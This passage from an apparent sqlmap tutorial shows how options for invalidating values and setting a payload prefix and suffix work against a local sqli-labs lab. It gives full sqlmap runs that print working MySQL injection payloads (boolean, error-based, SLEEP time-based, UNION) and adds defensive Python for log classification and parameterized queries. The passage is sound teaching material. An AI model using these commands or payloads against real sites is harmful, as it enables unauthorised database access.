      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:45:48 /2020-03-01/

[09:45:48] [INFO] testing connection to the target URL
[09:45:48] [INFO] checking if the target is protected by some kind of WAF/IPS
[09:45:48] [INFO] testing if the target URL content is stable
[09:45:49] [INFO] target URL content is stable
[09:45:49] [INFO] testing if GET parameter 'id' is dynamic
[09:45:49] [INFO] GET parameter 'id' appears to be dynamic
[09:45:49] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[09:45:49] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[09:45:49] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]

[09:45:51] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:45:51] [WARNING] reflective value(s) found and filtering out
[09:45:51] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[09:45:51] [INFO] testing 'Generic inline queries'
[09:45:52] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[09:45:52] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[09:45:52] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[09:45:52] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[09:45:52] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[09:45:52] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[09:45:52] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:45:52] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[09:45:52] [INFO] testing 'MySQL inline queries'
[09:45:52] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[09:45:52] [WARNING] time-based comparison requires larger statistical model, please wait....... (done)
[09:45:52] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[09:45:52] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[09:45:52] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[09:45:52] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[09:45:52] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[09:45:52] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[09:46:02] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[09:46:02] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[09:46:02] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[09:46:02] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[09:46:02] [INFO] target URL appears to have 3 columns in query
[09:46:03] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 8697=8697 AND 'vXiI'='vXiI

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 4143 FROM(SELECT COUNT(*),CONCAT(0x71786a6271,(SELECT (ELT(4143=4143,1))),0x71767a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'vpOq'='vpOq

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 4595 FROM (SELECT(SLEEP(5)))gWzN) AND 'BTap'='BTap

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-6582' UNION ALL SELECT NULL,CONCAT(0x71786a6271,0x4f4152547367744d454144444f7859484d52646f6e49564467667458597843725466574363435a6d,0x71767a7a71),NULL-- -
---
[09:46:06] [INFO] the back-end DBMS is MySQL
[09:46:06] [INFO] fetching banner
[09:46:07] [INFO] the back-end DBMS operating system is Linux
[09:46:07] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS operating system: Linux
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[09:46:07] [INFO] fetched data logged to text files under 'xxxxsqlmapoutput127.0.0.1'

[*] ending @ 09:46:07 /2020-03-01/

                                                                                                                                                                                                     

3. Forcing how sqlmap invalidates the original value

— The --invalid-bignum option

When sqlmap needs to invalidate the original parameter value (for example id=13), by default it uses classic negation (for example id=-13).
With the --invalid-bignum option you can force the use of large integers to achieve the same goal (for example id=99999999).
To check this:

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --invalid-bignum --banner -v 5

Output (abbreviated): with --invalid-bignum the UNION payload that appears is
Payload: id=462284' UNION ALL SELECT NULL,NULL,CONCAT(0x71706b6a71,0x676b6a4b566742436e7a6763484c4d6b6d4c6e61736141644542466a65725072454d6a6852677855,0x717a6b6a71)-- -
That is, during detection id is set to the larger value 462284.

— The --invalid-logical option

With the --invalid-logical option you can force the use of a logical operation to achieve the same goal (for example id=13 AND 18=19).
Test:

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --invalid-logical --banner

Output:

        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.4.2.31#dev}
|_ -| . [.]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:08:58 /2020-03-01/

[10:08:59] [INFO] testing connection to the target URL
[10:08:59] [INFO] checking if the target is protected by some kind of WAF/IPS
[10:08:59] [INFO] testing if the target URL content is stable
[10:08:59] [INFO] target URL content is stable
[10:08:59] [INFO] testing if GET parameter 'id' is dynamic
[10:08:59] [INFO] GET parameter 'id' appears to be dynamic
[10:08:59] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[10:08:59] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[10:08:59] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]

[10:09:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:09:01] [WARNING] reflective value(s) found and filtering out
[10:09:02] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[10:09:02] [INFO] testing 'Generic inline queries'
[10:09:02] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[10:09:02] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[10:09:02] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[10:09:02] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[10:09:02] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[10:09:02] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[10:09:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[10:09:02] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[10:09:02] [INFO] testing 'MySQL inline queries'
[10:09:02] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[10:09:02] [WARNING] time-based comparison requires larger statistical model, please wait....... (done)
[10:09:02] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[10:09:02] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[10:09:02] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[10:09:02] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[10:09:02] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[10:09:02] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[10:09:12] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[10:09:12] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[10:09:12] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[10:09:12] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[10:09:12] [INFO] target URL appears to have 3 columns in query
[10:09:12] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 3467=3467 AND 'vjnx'='vjnx

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 8283 FROM(SELECT COUNT(*),CONCAT(0x716b627a71,(SELECT (ELT(8283=8283,1))),0x716b7a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'whel'='whel

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 7542 FROM (SELECT(SLEEP(5)))AXCz) AND 'TpNY'='TpNY

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=1' AND 71 LIKE 72 UNION ALL SELECT NULL,CONCAT(0x716b627a71,0x4846764a516c586f4e7a4b5853725a43434f57454a5552516a4a494d576c494d4f61615353787549,0x716b7a7871),NULL-- -
---
[10:09:15] [INFO] the back-end DBMS is MySQL
[10:09:15] [INFO] fetching banner
[10:09:15] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[10:09:15] [INFO] fetched data logged to text files under 'xxxxsqlmapoutput127.0.0.1'

[*] ending @ 10:09:15 /2020-03-01/

                                                                                                                                                                                                   

As you can see, the payload that appeared is
Payload: id=1' AND 71 LIKE 72 UNION ALL SELECT NULL,CONCAT(0x716b627a71,0x4846764a516c586f4e7a4b5853725a43434f57454a5552516a4a494d576c494d4f61615353787549,0x716b7a7871),NULL-- -
that is, 71 LIKE 72, a logical condition that is false.

— The --invalid-string option

With the --invalid-string option you can force the use of random strings to achieve the same goal (for example id=akewmc).
To check this:

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 --invalid-string --banner

Output:

        ___                                                                                                                                               
       __H__                                                                                                                                              
 ___ ___[)]_____ ___ ___  {1.4.2.31#dev}                                                                                                                  
|_ -| . [(]     | .'| . |                                                                                                                                 
|___|_  [)]_|_|_|__,|  _|                                                                                                                                 
      |_|V...       |_|   http://sqlmap.org                                                                                                               
                                                                                                                                                          
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
                                                                                                                                                          
[*] starting @ 10:24:44 /2020-03-01/                                                                                                                      
                                                                                                                                                          
[10:24:44] [INFO] testing connection to the target URL                                                                                                    
[10:24:44] [INFO] checking if the target is protected by some kind of WAF/IPS                                                                             
[10:24:44] [INFO] testing if the target URL content is stable                                                                                             
[10:24:45] [INFO] target URL content is stable                                                                                                            
[10:24:45] [INFO] testing if GET parameter 'id' is dynamic                                                                                                
[10:24:45] [INFO] GET parameter 'id' appears to be dynamic                                                                                                
[10:24:45] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')                                       
[10:24:45] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks                            
[10:24:45] [INFO] testing for SQL injection on GET parameter 'id'                                                                                         
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]                                            
                                                                                                                                                          
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]                             
                                                                                                                                                          
[10:24:48] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'                                                                              
[10:24:48] [WARNING] reflective value(s) found and filtering out                                                                                          
[10:24:48] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")                   
[10:24:48] [INFO] testing 'Generic inline queries'                                                                                                        
[10:24:48] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'                                   
[10:24:48] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'                                                        
[10:24:48] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'                                               
[10:24:48] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'                                                                    
[10:24:49] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'                                       
[10:24:49] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'                                                            
[10:24:49] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'                                             
[10:24:49] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable                    
[10:24:49] [INFO] testing 'MySQL inline queries'                                                                                                          
[10:24:49] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'                                                                                     
[10:24:49] [WARNING] time-based comparison requires larger statistical model, please wait....... (done)                                                   
[10:24:49] [INFO] testing 'MySQL >= 5.0.12 stacked queries'                                                                                               
[10:24:49] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'                                                                       
[10:24:49] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'                                                                                 
[10:24:49] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'                                                                        
[10:24:49] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'                                                                                  
[10:24:49] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'                                                                            
[10:24:59] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable                                        
[10:24:59] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'                                                                                  
[10:24:59] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found     
[10:24:59] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[10:24:59] [INFO] target URL appears to have 3 columns in query                                                                                           
[10:24:59] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable                                                         
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y                                                                
sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:                                                                   
---                                                                                                                                                       
Parameter: id (GET)                                                                                                                                       
    Type: boolean-based blind                                                                                                                             
    Title: AND boolean-based blind - WHERE or HAVING clause                                                                                               
    Payload: id=1' AND 6118=6118 AND 'VaYg'='VaYg                                                                                                         
                                                                                                                                                          
    Type: error-based                                                                                                                                     
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)                                                              
    Payload: id=1' AND (SELECT 4130 FROM(SELECT COUNT(*),CONCAT(0x71626b7171,(SELECT (ELT(4130=4130,1))),0x71706b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'stHh'='stHh
                                                                                                                                                          
    Type: time-based blind                                                                                                                                
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)                                                                                             
    Payload: id=1' AND (SELECT 9229 FROM (SELECT(SLEEP(5)))WerB) AND 'LqGE'='LqGE                                                                         
                                                                                                                                                          
    Type: UNION query                                                                                                                                     
    Title: Generic UNION query (NULL) - 3 columns                                                                                                         
    Payload: id=atUzqr' UNION ALL SELECT NULL,NULL,CONCAT(0x71626b7171,0x6765636e6d4f5655424e4870554575704574706c785866526a79697964754e774c6278726a4b6872,0x71706b7871)-- -
---                                                                                                                                                       
[10:25:03] [INFO] the back-end DBMS is MySQL                                                                                                              
[10:25:03] [INFO] fetching banner                                                                                                                         
[10:25:03] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'                          
back-end DBMS: MySQL >= 5.0                                                                                                                               
banner: '5.7.26'                                                                                                                                          
[10:25:03] [INFO] fetched data logged to text files under 'xxxxsqlmapoutput127.0.0.1'                                         
                                                                                                                                                          
[*] ending @ 10:25:03 /2020-03-01/                                                                                                                        
                                                                                                                                                          
                                                                                                                                                                                                                                                                                                                                                   

The payload that appeared,
Payload: id=atUzqr' UNION ALL SELECT NULL,NULL,CONCAT(0x71626b7171,0x6765636e6d4f5655424e4870554575704574706c785866526a79697964754e774c6278726a4b6872,0x71706b7871)-- -
shows that the random string atUzqr was forced in to invalidate the original value.
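The three invalidation strategies above leave distinguishable traces in web server logs, which is useful on the defending side when triaging what a scanner did. As an added example (not code from the page or from sqlmap), the Python below pulls the `id` value out of a request target and labels it by the strategy that produced it; the request targets are constructed, and the 5-digit threshold for "bignum" is an assumption to tune to your application's real id range.

```python
"""Classify a request's ``id`` value by the sqlmap invalidation strategy
that produced it: default negation, --invalid-bignum, --invalid-logical or
--invalid-string.  Added example, not sqlmap's code; request targets are
constructed."""
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Constructed request targets: a normal request, one per strategy shown on
# the page, and a non-UNION boolean-based payload for contrast.
SAMPLE_REQUESTS = [
    "/sqli-labs/Less-1/?id=1",
    "/sqli-labs/Less-1/?id=-6582' UNION ALL SELECT NULL,NULL,NULL-- -",
    "/sqli-labs/Less-1/?id=462284' UNION ALL SELECT NULL,NULL,NULL-- -",
    "/sqli-labs/Less-1/?id=1' AND 71 LIKE 72 UNION ALL SELECT NULL,NULL,NULL-- -",
    "/sqli-labs/Less-1/?id=atUzqr' UNION ALL SELECT NULL,NULL,NULL-- -",
    "/sqli-labs/Less-1/?id=1' AND 8697=8697 AND 'vXiI'='vXiI",
]

UNION_RE = re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.IGNORECASE)
# The leading token of the value tells the strategies apart; each form is
# followed by the closing quote, whitespace or the end of the value.
NEGATION_RE = re.compile(r"^-\d+(?=['\s]|$)")
BIGNUM_RE = re.compile(r"^\d{5,}(?=['\s]|$)")  # assumption: real ids have < 5 digits
LOGICAL_RE = re.compile(r"^\d+'?\s+AND\s+\d+\s+LIKE\s+\d+\b", re.IGNORECASE)
RANDSTR_RE = re.compile(r"^[A-Za-z]{4,}(?=['\s]|$)")
QUOTE_BOOL_RE = re.compile(r"'\s*(?:AND|OR)\s+", re.IGNORECASE)


def classify_id_value(value: str) -> str:
    """Label a decoded ``id`` value.  UNION payloads are split by how the
    original value was invalidated; everything else only by whether it
    looks like a quoted boolean condition at all."""
    if not UNION_RE.search(value):
        return "non-union-sqli" if QUOTE_BOOL_RE.search(value) else "benign"
    if NEGATION_RE.match(value):
        return "negation"          # default: id=-6582'
    if BIGNUM_RE.match(value):
        return "bignum"            # --invalid-bignum: id=462284'
    if LOGICAL_RE.match(value):
        return "logical"           # --invalid-logical: id=1' AND 71 LIKE 72
    if RANDSTR_RE.match(value):
        return "random-string"     # --invalid-string: id=atUzqr'
    return "union-other"


def classify_request(target: str) -> str:
    """Extract ``id`` from a request target (URL-decoding it) and classify."""
    values = parse_qs(urlsplit(target).query, keep_blank_values=True).get("id")
    return classify_id_value(values[0]) if values else "no-id"


def summarize(targets) -> dict:
    """Count classifications over a batch of request targets."""
    return dict(Counter(classify_request(t) for t in targets))


if __name__ == "__main__":
    for target in SAMPLE_REQUESTS:
        print(f"{classify_request(target):15} {target}")
    print(summarize(SAMPLE_REQUESTS))
```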

4. Custom placement of the sqlmap injection payload

In some cases a vulnerable parameter can only be exploited when the user supplies a specific suffix that is appended to the injected payload.
When the user already knows the query syntax and wants to detect and exploit the SQL injection by directly specifying the prefix and suffix of the injected payload, the following options come in handy:

  • --prefix
    Set the prefix of the SQL injection payload
  • --suffix
    Set the suffix of the SQL injection payload
$query = "SELECT * FROM users WHERE id=('" . $_GET['id'] . "') LIMIT 0, 1";

python sqlmap.py -u "http://ip/sqlmap/mysql/get_str_brackets.php?id=1" -p id --prefix "')" --suffix " AND ('abc'='abc"

# With the query and the command above, every request sqlmap sends ends up in a query of this form
$query = "SELECT * FROM users WHERE id=('1') <PAYLOAD> AND ('abc'='abc') LIMIT 0, 1";
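To see why the prefix `')` and suffix ` AND ('abc'='abc` fit the bracketed-string query, and why the same input stops mattering once the query is parameterized, here is an added example (not the page's PHP code, and not sqlmap's) that rebuilds the `id=('...')` query shape in Python with sqlite3; the `users` table and its rows are constructed.

```python
"""The page's query shape, concatenated vs. parameterized, run against the
same prefix/suffix-composed value.  Added example using sqlite3 in place of
PHP/MySQL; table and rows are constructed."""
import sqlite3

# Same shape as the page's PHP query: the id is concatenated inside ('...').
VULNERABLE_SQL = "SELECT * FROM users WHERE id=('{id}') LIMIT 0, 1"
# Hardened form: the value is bound as a parameter, never spliced into SQL.
SAFE_SQL = "SELECT * FROM users WHERE id=(?) LIMIT 0, 1"


def setup_db() -> sqlite3.Connection:
    """In-memory database with a constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", [(1, "alice"), (2, "bob")])
    return conn


def build_injected_value(original: str, prefix: str, payload: str, suffix: str) -> str:
    """Compose the parameter value the way --prefix/--suffix do: original
    value, then prefix, then the test payload, then suffix."""
    return f"{original}{prefix}{payload}{suffix}"


def lookup_vulnerable(conn: sqlite3.Connection, user_id: str):
    """String concatenation: returns (final SQL text, rows)."""
    sql = VULNERABLE_SQL.format(id=user_id)
    return sql, conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, user_id: str):
    """Parameterized: the whole string is compared against the integer id."""
    return conn.execute(SAFE_SQL, (user_id,)).fetchall()


def compare(conn: sqlite3.Connection, user_id: str):
    """Run both forms on the same input; the vulnerable one evaluates the
    payload as SQL, the safe one finds no row because the text never
    equals an integer id."""
    _, vuln_rows = lookup_vulnerable(conn, user_id)
    return vuln_rows, lookup_safe(conn, user_id)


if __name__ == "__main__":
    db = setup_db()
    # A true and a false condition in the <PAYLOAD> slot of the page's query.
    for test_payload in (" AND 1=1", " AND 1=2"):
        value = build_injected_value("1", "')", test_payload, " AND ('abc'='abc")
        sql, rows = lookup_vulnerable(db, value)
        print(sql)
        print("  concatenated ->", rows, "| parameterized ->", lookup_safe(db, value))
```

The concatenated query answers the true and false conditions differently, which is exactly the signal boolean-based blind detection relies on; the parameterized query returns nothing for both.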

Run the test:

python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 -p id --prefix "')" --suffix " AND ('abc'='abc"

Output:

        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.4.2.31#dev}
|_ -| . [.]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:38:09 /2020-03-01/

[10:38:09] [INFO] testing connection to the target URL
[10:38:09] [INFO] checking if the target is protected by some kind of WAF/IPS
[10:38:09] [INFO] testing if the target URL content is stable
[10:38:10] [INFO] target URL content is stable
[10:38:10] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[10:38:10] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[10:38:10] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]

[10:38:11] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:38:12] [WARNING] reflective value(s) found and filtering out
[10:38:12] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[10:38:12] [INFO] testing 'Generic inline queries'
[10:38:12] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[10:38:12] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[10:38:12] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[10:38:12] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[10:38:12] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[10:38:12] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[10:38:12] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[10:38:12] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[10:38:12] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[10:38:12] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[10:38:12] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
[10:38:12] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[10:38:12] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
[10:38:12] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[10:38:12] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
[10:38:12] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[10:38:12] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[10:38:12] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[10:38:12] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[10:38:12] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[10:38:12] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
[10:38:12] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
[10:38:12] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[10:38:12] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[10:38:12] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[10:38:12] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[10:38:12] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[10:38:12] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[10:38:12] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[10:38:13] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[10:38:13] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
